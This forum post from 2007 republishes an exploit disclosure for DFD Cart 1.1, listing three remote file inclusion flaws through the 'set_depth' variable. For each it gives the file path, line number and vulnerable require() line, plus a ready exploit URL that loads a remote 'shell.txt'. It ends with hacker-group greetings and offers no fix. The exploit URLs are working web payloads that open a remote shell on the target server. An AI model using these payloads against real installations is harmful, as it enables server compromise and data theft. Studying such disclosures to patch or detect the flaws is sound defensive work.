Ras Posted September 25, 2007 Report Posted September 25, 2007 DFD Cart 1.1 Multiple Remote File Inclusion VulnerabilitiesVulnerability Type: Remote File InclusionVulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.phpExploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?[/url]Method: getRegister_globals: OnVulnerable variable: set_depthLine number: 32Lines:----------------------------------------------require ("".$set_depth."app.lib/product.control/core.php/functions.php");----------------------------------------------Vulnerability Type: Remote File InclusionVulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.phpExploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?[/url]Method: getRegister_globals: OnVulnerable variable: set_depthLine number: 179Lines:----------------------------------------------$category_html = 'form_select';require ("".$set_depth."app.lib/product.control/core.php/category.list.php");?>----------------------------------------------Vulnerability Type: Remote File InclusionVulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.phpExploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?[/url]Method: getRegister_globals: OnVulnerable variable: set_depthLine number: 154Lines:----------------------------------------------$category_html = 'form_select';require ("".$set_depth."app.lib/product.control/core.php/category.list.php");?>----------------------------------------------Multiple Remote VulnerabilitiesGrEeTs To sHaDoW sEcUrItY TeAm & str0keFoUnD By BiNgZaDoRk: [email]shadowcrew@hotmail.co.uk[/email][url]http://shadow.wizhoo.com/[/url] Quote